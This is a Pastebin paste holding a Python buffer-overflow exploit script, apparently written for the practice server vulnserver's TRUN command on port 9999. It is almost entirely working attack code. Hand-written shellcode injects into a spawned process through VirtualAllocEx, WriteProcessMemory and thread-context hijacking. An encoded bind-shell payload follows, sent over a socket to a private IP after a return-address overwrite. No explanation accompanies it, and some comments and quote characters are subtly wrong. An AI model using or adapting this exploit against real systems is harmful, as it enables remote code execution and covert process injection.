Guest User

Untitled

a guest
Jun 12th, 2021
57
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/python
  2. import socket
  3. import sys
  4.  
  5. payload="\xBA\x73\x7D\x74\x10" #MOV EDX,10747d73
  6. payload+="\x81\xEA\x10\x10\x10\x10" #SUB EDX,10101010
  7. payload+="\x52" #PUSH EDX
  8. payload+="\x8B\xDC" #MOV EBX,ESP
  9. payload+="\x33\xC9"#XOR ECX,ECX
  10. payload+="\x51\x51\x51\x51\x51\x51\x51\x51\x51\x51\x51\x51\x51\x51\x51\x51\x51" #PUSH ECX
  11. payload+="\x8B\xF4"#MOV ESI,ESP
  12. payload+="\x8B\xFE"#MOV EDI,ESI
  13. payload+="\x83\xC7\x04" #MOV ADD EDI,4
  14. payload+="\x57" #PUSH EDI
  15. payload+="\x56" #PUSH ESI
  16. payload+="\x51\x51" #push ecx
  17. payload+="\xB9\x05\x01\x01\x09" #mov ecx,9010105
  18. payload+="\x81\xE9\x01\x01\x01\x01" #sub ecx,1010101
  19. payload+="\x51" #PUSH ecx
  20. payload+="\x33\xC9" #XOR ECX,ECX
  21. payload+="\x51" #PUSH ecx
  22. payload+="\x51" #PUSH ecx
  23. payload+="\x51" #PUSH ecx
  24. #payload+="\x51" #PUSH ecx
  25. payload+="\x53" #PUSH ebx
  26. payload+="\x51" #PUSH ecx
  27. payload+="\xBB\x82\x20\xDE\x77" #MOV EBX,CreateProcessA
  28. payload+="\xff\xd3" #Call EBX
  29.  
  30. payload+="\x5E" #pop esi
  31. payload+="\x5E" #pop esi store
  32. payload+="\x5f" #pop edi
  33. payload+="\x6A\x40" #PUSH 40 flprotect PAGE_EXECUTE_READWRITE
  34. payload+="\x33\xC9" #XOR ECX,ECX
  35. payload+="\xb5\x30" #MOV CH,30
  36. payload+="\x51" #PUSH ECX flAllocationType
  37. payload+="\xb5\x01" #MOV CH,01
  38. payload+="\xb1\xf4" #MOV CL,0F4
  39. payload+="\x51" #PUSH ECX
  40. payload+="\x33\xC9" #XOR ECX,ECX
  41. payload+="\x51" #PUSH ECX
  42. payload+="\x56" #PUSH ESI
  43. payload+="\xBB\xB6\xc1\xe1\x77"#MOV EBX,kernel32.VirtualallocEx payload+="\xBB\xB6\xc1\xe1\x77″
  44. payload+="\xff\xd3" #Call EBX
  45. payload+="\x8B\xE8" #MOV EBP,EAX
  46.  
  47. payload+="\x33\xdb" #XOR EBX,EBX
  48. payload+="\x53"#PUSH EBX
  49. payload+="\xb7\x01"#MOV BH,1
  50. payload+="\xb3\xf4"#MOV bl,0f4
  51. payload+="\x53" #PUSH EBX
  52. payload+="\x8b\xdc"#mov EBX,ESP
  53. payload+="\x66\x81\xC3\x74\x02" #ADD BX,274
  54. payload+="\x53" #PUSH EBX
  55. payload+="\x50" #PUSH EAX
  56. payload+="\x56" #PUSH ESI
  57. payload+="\xBB\xde\xC1\xe1\x77" #MOV EBX,kernel32.writeProcessMEMORY
  58. payload+="\xff\xd3" #Call EBX
  59.  
  60. payload+="\x8b\xdc"#MOV EBX,ESP
  61. payload+="\x66\x81\xEB\x50\x01" #SUB BX,150
  62. payload+="\x33\xc9" #XOR ECX,ECX
  63. payload+="\x66\xB9\xff\xff"#MOV CX,0xffff
  64. payload+="\x41" #inc ecx
  65. payload+="\x41" #inc ecx
  66. payload+="\x89\x0B"#MOV DWORD[EBX],ECX
  67. payload+="\x53"#PUSH ECX
  68. payload+="\x57"#PUSH EDI
  69. payload+="\xB9\xC1\x0C\xE4\x77"#MOV ECX,kernel32.GetThreadContext
  70. payload+="\xff\xd1" #Call ECX
  71.  
  72. payload+="\x8b\xcb"#MOV ECX,EbX
  73. payload+="\x80\xc1\xb8" #ADD CL,0xb8
  74. payload+="\x80\xc5\x01" #ADD CH,0x1
  75. payload+="\x89\x29" #MOV DWORD [ECX],EBP
  76. payload+="\x53" #PUSH EDX
  77. payload+="\x57" #PUSH EDI
  78. payload+="\xbb\x93\x01\xe7\x77" #mov ebx,kernel32.SetThreadContext
  79. payload+="\xff\xd3" #Call EBX
  80.  
  81. payload+="\x57" #PUSH EDI
  82. payload+="\xbb\x1c\x0f\xe2\x77"#MOV EBX,kernel32.ResumeThread
  83. payload+="\xff\xd3" #Call EBX
  84.  
  85. payload+="\x33\xc9" #XOR ECX,ECX
  86. payload+="\x51" #PUSH ECX
  87. payload+="\xBB\x4f\x21\xe3\x77" #mov ebx,kernel32.ExitProcess
  88. payload+="\xff\xd3" #Call EBX
  89.  
  90. sleep=""
  91. sleep+="\x33\xc9" #XOR ECX,ECX
  92. sleep+="\xB1\x88" #MOV CL,88
  93. sleep+="\xB5\x13" #MOV CH,13
  94. sleep+="\x51" #PUSH ECX
  95. sleep+="\xbb\x46\xba\xe2\x77" #MOV EBX,kernel32.Sleep
  96. sleep+="\xff\xd3" #Call EBX
  97.  
  98. bind_shell=("\xda\xc2\xd9\x74\x24\xf4\xbd\x90\xac\x38\xd9\x58\x29\xc9\xb1"
  99. "\x53\x31\x68\x17\x83\xc0\x04\x03\xf8\xbf\xda\x2c\x04\x57\x98"
  100. "\xcf\xf4\xa8\xfd\x46\x11\x99\x3d\x3c\x52\x8a\x8d\x36\x36\x27"
  101. "\x65\x1a\xa2\xbc\x0b\xb3\xc5\x75\xa1\xe5\xe8\x86\x9a\xd6\x6b"
  102. "\x05\xe1\x0a\x4b\x34\x2a\x5f\x8a\x71\x57\x92\xde\x2a\x13\x01"
  103. "\xce\x5f\x69\x9a\x65\x13\x7f\x9a\x9a\xe4\x7e\x8b\x0d\x7e\xd9"
  104. "\x0b\xac\x53\x51\x02\xb6\xb0\x5c\xdc\x4d\x02\x2a\xdf\x87\x5a"
  105. "\xd3\x4c\xe6\x52\x26\x8c\x2f\x54\xd9\xfb\x59\xa6\x64\xfc\x9e"
  106. "\xd4\xb2\x89\x04\x7e\x30\x29\xe0\x7e\x95\xac\x63\x8c\x52\xba"
  107. "\x2b\x91\x65\x6f\x40\xad\xee\x8e\x86\x27\xb4\xb4\x02\x63\x6e"
  108. "\xd4\x13\xc9\xc1\xe9\x43\xb2\xbe\x4f\x08\x5f\xaa\xfd\x53\x08"
  109. "\x1f\xcc\x6b\xc8\x37\x47\x18\xfa\x98\xf3\xb6\xb6\x51\xda\x41"
  110. "\xb8\x4b\x9a\xdd\x47\x74\xdb\xf4\x83\x20\x8b\x6e\x25\x49\x40"
  111. "\x6e\xca\x9c\xfd\x66\x6d\x4f\xe0\x8b\xcd\x3f\xa4\x23\xa6\x55"
  112. "\x2b\x1c\xd6\x55\xe1\x35\x7f\xa8\x0a\x1e\x8f\x25\xec\x0a\x9f"
  113. "\x63\xa6\xa2\x5d\x50\x7f\x55\x9d\xb2\xd7\xf1\xd6\xd4\xe0\xfe"
  114. "\xe6\xf2\x46\x68\x6d\x11\x53\x89\x72\x3c\xf3\xde\xe5\xca\x92"
  115. "\xad\x94\xcb\xbe\x45\x34\x59\x25\x95\x33\x42\xf2\xc2\x14\xb4"
  116. "\x0b\x86\x88\xef\xa5\xb4\x50\x69\x8d\x7c\x8f\x4a\x10\x7d\x42"
  117. "\xf6\x36\x6d\x9a\xf7\x72\xd9\x72\xae\x2c\xb7\x34\x18\x9f\x61"
  118. "\xef\xf7\x49\xe5\x76\x34\x4a\x73\x77\x11\x3c\x9b\xc6\xcc\x79"
  119. "\xa4\xe7\x98\x8d\xdd\x15\x39\x71\x34\x9e\x49\x38\x14\xb7\xc1"
  120. "\xe5\xcd\x85\x8f\x15\x38\xc9\xa9\x95\xc8\xb2\x4d\x85\xb9\xb7"
  121. "\x0a\x01\x52\xca\x03\xe4\x54\x79\x23\x2d")
  122.  
  123. shellcode = "A" * 2003 + "\xaf\x11\x50\x62" + payload + "C"*(2500-len(payload)-4-2003-10)+"\x90"*100+sleep+"\x90"*10+bind_shell #625011af
  124.  
  125. try:
  126. s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  127. connect=s.connect((‘172.16.12.204’,9999))
  128. s.send((‘TRUN /.:/’+shellcode))
  129. print("Fuzzing with TRUN comamnd with %s bytes"% str(len(shellcode)))
  130. s.close()
  131. except:
  132. print("Error connecting to server")
  133. sys.exit()
RAW Paste Data